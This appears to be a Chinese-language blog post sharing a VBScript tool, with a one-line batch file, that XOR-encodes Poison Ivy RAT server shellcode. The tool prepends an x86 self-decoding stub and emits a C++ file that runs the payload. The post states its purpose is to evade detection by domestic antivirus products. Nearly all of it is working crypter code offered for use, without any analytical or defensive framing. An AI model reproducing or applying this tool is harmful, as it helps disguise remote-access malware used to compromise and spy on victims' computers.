异或Poison Ivy 服务端 Shellcode VBS 工具

Poison Ivy配置服务端可以生成不同格式的Shellcode,对Shellcode进行异或加密可以使生成的服务端逃过一些国产杀毒软件的查杀。下面的工具可以将Poison Ivy生成的二进制Shellcode(.bin文件)转换成可直接编译的.cpp文件。实验环境为XP + VC++6.0。

shellcode.vbs

if (lcase(right(wscript.fullname,11))="wscript.exe") then
wscript.echo "Execute it under the cmd.exe Plz! Thx."
wscript.quit
end if

if Wscript.Arguments.count=0 Then
usage()
wscript.quit
End If

'10进制转16进制函数
Function Dec2Hex(Dec)
     Dec2Hex = ""
     Do While Dec > 0
         a = CStr(Dec Mod 16)
         Select Case a
             Case "10": a = "A"
             Case "11": a = "B"
             Case "12": a = "C"
             Case "13": a = "D"
             Case "14": a = "E"
             Case "15": a = "F"
         End Select
         Dec2Hex = a & Dec2Hex
         Dec = Dec \ 16
     Loop
End Function

'读取二进制文件函数

Function ReadGif(sStr)
Dim i, iHex, sPath, oStream
Set oStream = CreateObject("Adodb.Stream")
oStream.Type = 1
oStream.Open
oStream.LoadFromFile sStr

For i = 1 To LenB(oStream.Read())
     oStream.Position = 0
     iHex = Hex(AscB(MidB(oStream.Read(), i, 1)))
     If Len(iHex) = 1 Then iHex = "0" & iHex
     ReadGif = ReadGif & iHex
Next

oStream.Close
Set oStream = Nothing
End Function

'把代码分块输出函数
Function CutAndJoin(sSource, iLong, sJoiner)

Dim I, N

N = Len(sSource) / iLong
If(N <> Fix(N))Then N = Fix(N) + 1

For I = 0 To N - 1
   CutAndJoin = CutAndJoin & Mid(sSource, I * iLong + 1, iLong) & sJoiner
Next

If(N > 0)Then CutAndJoin = Left(CutAndJoin, Len(CutAndJoin) - Len(sJoiner))

End Function

Set Arg=Wscript.Arguments

tempshellccode=CutAndJoin(ReadGif(arg(0)),2,"\x")

shellcode=Split(tempshellccode,"\x")


For i=1 To UBound(shellcode)
temp=(("&h"&shellcode(i)) Xor "&h"&arg(1))
temp=Dec2Hex(CStr(temp))
If Len(temp)=1 Then temp="0"&temp
If temp="" Then temp="00"
vbshellcode=vbshellcode&"\x"&temp
Next

decode="\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x34\x21\x80\x34\x0A\x"&arg(1)&"\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF"
decode=decode&LCase(vbshellcode)

WScript.Echo CutAndJoin(decode, 80, Chr(13)) '80正好是4的倍数,这样排列好看一些


Function writef(cpp)
Set FSO = CreateObject("Scripting.FileSystemObject")
with fso.opentextfile(cpp,2,true)
.writeline "#include<windows.h>"
.writeline "#pragma comment(linker, "&Chr(34)&"/OPT:NOWIN98"&Chr(34)&")"
.writeline "#pragma comment(linker, "&Chr(34)&"/subsystem:\"&Chr(34)&"windows\"&Chr(34)&" /entry:\"&Chr(34)&"mainCRTStartup\"&Chr(34)&""&Chr(34)&" )"
.writeline "#pragma comment(linker, "&Chr(34)&"/MERGE:.rdata=.text"&Chr(34)&")"
    .writeline "char ShellCode[]="
.writeline Chr(34)&CutAndJoin(decode, 80, Chr(34)&Chr(13)&Chr(34))&Chr(34)&";"
.writeline "int main()"
    .writeline "{"
    .writeline " ( (void(*)(void)) &ShellCode)();"
    .writeline "return 0;"
    .writeline "}"
   .close
End with
Set fso = Nothing
End Function

writef(arg(2))


Function Findfile(str)
Set FSO = CreateObject("Scripting.FileSystemObject")
If FSO.FileExists(str) Then
findfile=true
Else
findfile=false
End If
End Function


If Findfile(arg(2))=True then
wsh.echo "已生成"&arg(2)&"的c语言格式文件"
End if


function usage()
wscript.echo "+---------- ^^ shellcode xor for Poison Ivy 2.3.2 vbscript----------+"
wscript.echo "|不只是针对Poison的bin文件进行变形,稍做改动可以xor其它的shellcode---+"
wscript.echo "|Useage:                                                            |"
wscript.echo "|       cscript.exe shellcode.vbs x.bin xorhexnum test.cpp          |"
wscript.echo "|ex:                                                                |"
wscript.echo "|       cscript.exe shellcode.vbs c:\PoisonIvy.bin 21 c:\test.cpp   |"
wscript.echo "+-------------------------------------------------------------------+"&chr(10)
end function

shellcode.bat

cscript.exe shellcode.vbs c:\PoisonIvy.bin 85 c:\PoisonIvy.cpp

shellcode.bat和shellcode.vbs放在同一目录中,编辑shellcode.bat可以设置.bin文件和.cpp文件的目录,中间的数字为异或值。

发表评论

电子邮件地址不会被公开。 必填项已用*标注